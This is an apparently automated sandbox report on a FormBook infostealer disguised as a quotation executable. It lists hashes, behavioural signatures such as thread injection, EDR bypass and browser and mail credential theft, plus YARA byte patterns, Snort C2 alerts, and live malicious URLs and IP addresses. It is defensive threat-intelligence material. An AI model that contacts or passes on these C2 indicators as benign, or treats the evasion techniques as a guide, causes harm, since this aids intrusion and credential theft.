Edit tour

Windows Analysis Report
PTT Group project - Quotation.exe

Overview

General Information

Sample name:	PTT Group project - Quotation.exe
Analysis ID:	1467924
MD5:	0ffee94b9fb3a74d3f1ad3774edc51ed
SHA1:	0fe3355e5e7a1543c42a1c66fd9285b2b0529af0
SHA256:	c413b461e4df7628f4ccdaa98233ec18a3d6808265dc38f631902ef58f502c88
Tags:	exe
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

PTT Group project - Quotation.exe (PID: 6804 cmdline: "C:\Users\user\Desktop\PTT Group project - Quotation.exe" MD5: 0FFEE94B9FB3A74D3F1AD3774EDC51ED)

svchost.exe (PID: 480 cmdline: "C:\Users\user\Desktop\PTT Group project - Quotation.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

KWyVcOvVIsFTpZOKF.exe (PID: 5544 cmdline: "C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

RMActivate_ssp.exe (PID: 4416 cmdline: "C:\Windows\SysWOW64\RMActivate_ssp.exe" MD5: 6599A09C160036131E4A933168DA245F)

KWyVcOvVIsFTpZOKF.exe (PID: 980 cmdline: "C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 3992 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.4088478825.00000000030D0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.4088478825.00000000030D0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a7b0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13eff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.4087484758.00000000029A0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.4087484758.00000000029A0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a7b0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13eff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000001.00000002.1762561300.0000000000EE0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.1762561300.0000000000EE0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a7b0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13eff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.4088367341.0000000002F50000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.4088367341.0000000002F50000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a7b0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13eff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000001.00000002.1762331518.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.1762331518.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2db43:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17292:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.4090192746.0000000005020000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.4090192746.0000000005020000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x7a2b9:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x63a08:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.4088706556.00000000024B0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.4088706556.00000000024B0000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x9fbafa:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9e5249:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000001.00000002.1764648995.0000000003B50000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.1764648995.0000000003B50000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x9fbafa:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9e5249:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
1.2.svchost.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2cd43:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x16492:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
1.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
1.2.svchost.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2db43:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17292:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\PTT Group project - Quotation.exe", CommandLine: "C:\Users\user\Desktop\PTT Group project - Quotation.exe", CommandLine|base64offset|contains: ., Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PTT Group project - Quotation.exe", ParentImage: C:\Users\user\Desktop\PTT Group project - Quotation.exe, ParentProcessId: 6804, ParentProcessName: PTT Group project - Quotation.exe, ProcessCommandLine: "C:\Users\user\Desktop\PTT Group project - Quotation.exe", ProcessId: 480, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\PTT Group project - Quotation.exe", CommandLine: "C:\Users\user\Desktop\PTT Group project - Quotation.exe", CommandLine|base64offset|contains: ., Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PTT Group project - Quotation.exe", ParentImage: C:\Users\user\Desktop\PTT Group project - Quotation.exe, ParentProcessId: 6804, ParentProcessName: PTT Group project - Quotation.exe, ProcessCommandLine: "C:\Users\user\Desktop\PTT Group project - Quotation.exe", ProcessId: 480, ProcessName: svchost.exe

Snort Signatures

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 35.190.52.58

Timestamp:	07/05/24-03:25:39.522626
SID:	2855464
Source Port:	52679
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 38.47.232.224

Timestamp:	07/05/24-03:25:17.434107
SID:	2855464
Source Port:	52675
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 35.190.52.58

Timestamp:	07/05/24-03:25:47.112498
SID:	2855465
Source Port:	52682
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 38.47.232.224

Timestamp:	07/05/24-03:25:25.040218
SID:	2855465
Source Port:	52678
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 116.213.43.190

Timestamp:	07/05/24-03:22:44.137161
SID:	2855465
Source Port:	52653
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 116.213.43.190

Timestamp:	07/05/24-03:23:49.082597
SID:	2855465
Source Port:	52662
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 38.47.232.224

Timestamp:	07/05/24-03:25:19.972876
SID:	2855464
Source Port:	52676
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 116.213.43.190

Timestamp:	07/05/24-03:22:36.484948
SID:	2855464
Source Port:	52650
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 116.213.43.190

Timestamp:	07/05/24-03:24:37.238794
SID:	2855465
Source Port:	52670
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 13.248.169.48

Timestamp:	07/05/24-03:25:06.504222
SID:	2855464
Source Port:	52672
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 35.190.52.58

Timestamp:	07/05/24-03:25:42.054601
SID:	2855464
Source Port:	52680
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 13.248.169.48

Timestamp:	07/05/24-03:25:03.943847
SID:	2855464
Source Port:	52671
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 147.92.36.231

Timestamp:	07/05/24-03:23:29.912994
SID:	2855464
Source Port:	52656
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 116.213.43.190

Timestamp:	07/05/24-03:24:29.616614
SID:	2855464
Source Port:	52667
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 203.161.55.102

Timestamp:	07/05/24-03:24:15.863599
SID:	2855464
Source Port:	52663
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 203.161.55.102

Timestamp:	07/05/24-03:24:23.613781
SID:	2855465
Source Port:	52666
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 13.248.169.48

Timestamp:	07/05/24-03:25:11.574084
SID:	2855465
Source Port:	52674
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 116.213.43.190

Timestamp:	07/05/24-03:23:44.022116
SID:	2855464
Source Port:	52660
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 147.92.36.231

Timestamp:	07/05/24-03:23:34.991939
SID:	2855465
Source Port:	52658
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 116.213.43.190

Timestamp:	07/05/24-03:23:41.421571
SID:	2855464
Source Port:	52659
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 147.92.36.231

Timestamp:	07/05/24-03:23:27.380572
SID:	2855464
Source Port:	52655
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 165.154.0.120

Timestamp:	07/05/24-03:22:20.185133
SID:	2855465
Source Port:	52649
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 116.213.43.190

Timestamp:	07/05/24-03:24:32.160099
SID:	2855464
Source Port:	52668
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 116.213.43.190

Timestamp:	07/05/24-03:22:39.023005
SID:	2855464
Source Port:	52651
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 203.161.55.102

Timestamp:	07/05/24-03:24:18.527866
SID:	2855464
Source Port:	52664
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.binpvae.lol/kfqo/?9TND4h=NiOdQOuMLD2zHgMWwKws4JzuutDmLpx3tWxYTf2s7ZGupi3Uz5m5Dts89dE7D44P7JMDqAvEJ+8u+Llyo4b9pPx+fjdmUm+qFImntH+EZRPwIZM2dcS4AHM=&MXOD=nDFLlbM87h	Avira URL Cloud: Label: malware
Source: http://www.binpvae.lol/kfqo/	Avira URL Cloud: Label: malware
Source: http://www.778981.com/p1dd/?MXOD=nDFLlbM87h&9TND4h=G7DDmCfNGXy3uJCEgcIIU1iXFvarFYWbvsRS9sxoYaNScQyM2A1goKEbo8KV9mX8trrejs5AH6YGa7AwDEXag2zD7gw0a+PZJfygUURv+5LCwJWR5NAeUOI=	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: www.hsck520.com	Virustotal: Detection: 5%	Perma Link
Source: www.778981.com	Virustotal: Detection: 10%	Perma Link
Source: http://www.binpvae.lol/kfqo/	Virustotal: Detection: 6%	Perma Link
Source: http://www.hsck520.com/2e2r/	Virustotal: Detection: 8%	Perma Link
Source: http://www.hsck520.com	Virustotal: Detection: 5%	Perma Link

Multi AV Scanner detection for submitted file

Source: PTT Group project - Quotation.exe	ReversingLabs: Detection: 36%
Source: PTT Group project - Quotation.exe	Virustotal: Detection: 34%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4088478825.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4087484758.00000000029A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1762561300.0000000000EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4088367341.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1762331518.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4090192746.0000000005020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4088706556.00000000024B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1764648995.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: PTT Group project - Quotation.exe

Joe Sandbox ML: detected

Source: PTT Group project - Quotation.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: KWyVcOvVIsFTpZOKF.exe, 00000002.00000000.1682080075.000000000069E000.00000002.00000001.01000000.00000004.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000005.00000000.1834850249.000000000069E000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: rmactivate_ssp.pdb source: svchost.exe, 00000001.00000003.1730334364.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1731134326.0000000003701000.00000004.00000020.00020000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000002.00000002.4088107125.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000002.00000002.4092075647.0000000005080000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: PTT Group project - Quotation.exe, 00000000.00000003.1647870847.0000000003680000.00000004.00001000.00020000.00000000.sdmp, PTT Group project - Quotation.exe, 00000000.00000003.1648740790.0000000003870000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1763015202.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1763015202.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1652445015.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1654212029.0000000003600000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4088663441.0000000003340000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000003.1762307903.0000000002FD0000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000003.1772192727.000000000318C000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4088663441.00000000034DE000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: PTT Group project - Quotation.exe, 00000000.00000003.1647870847.0000000003680000.00000004.00001000.00020000.00000000.sdmp, PTT Group project - Quotation.exe, 00000000.00000003.1648740790.0000000003870000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1763015202.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1763015202.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1652445015.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1654212029.0000000003600000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, RMActivate_ssp.exe, 00000003.00000002.4088663441.0000000003340000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000003.1762307903.0000000002FD0000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000003.1772192727.000000000318C000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4088663441.00000000034DE000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: RMActivate_ssp.exe, 00000003.00000002.4087642790.0000000002DC3000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4089116810.000000000396C000.00000004.10000000.00040000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000005.00000002.4088627058.0000000002BEC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2051321397.00000000122AC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: RMActivate_ssp.exe, 00000003.00000002.4087642790.0000000002DC3000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4089116810.000000000396C000.00000004.10000000.00040000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000005.00000002.4088627058.0000000002BEC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2051321397.00000000122AC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: rmactivate_ssp.pdbGCTL source: svchost.exe, 00000001.00000003.1730334364.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1731134326.0000000003701000.00000004.00000020.00020000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000002.00000002.4088107125.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000002.00000002.4092075647.0000000005080000.00000004.00000001.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_00974696 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00974696
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_0097C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0097C9C7
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_0097C93C FindFirstFileW,FindClose,	0_2_0097C93C
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_0097F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0097F200
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_0097F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0097F35D
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_0097F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0097F65E
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_00973A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00973A2B
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_00973D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00973D4E
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_0097BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0097BF27
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 3_2_029BBBE0 FindFirstFileW,FindNextFileW,FindClose,	3_2_029BBBE0

Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 4x nop then xor eax, eax		3_2_029A9730
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe	Code function: 4x nop then mov ebx, 00000004h		3_2_031B0544

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:52649 -> 165.154.0.120:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:52650 -> 116.213.43.190:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:52651 -> 116.213.43.190:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:52653 -> 116.213.43.190:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:52655 -> 147.92.36.231:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:52656 -> 147.92.36.231:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:52658 -> 147.92.36.231:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:52659 -> 116.213.43.190:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:52660 -> 116.213.43.190:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:52662 -> 116.213.43.190:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:52663 -> 203.161.55.102:80
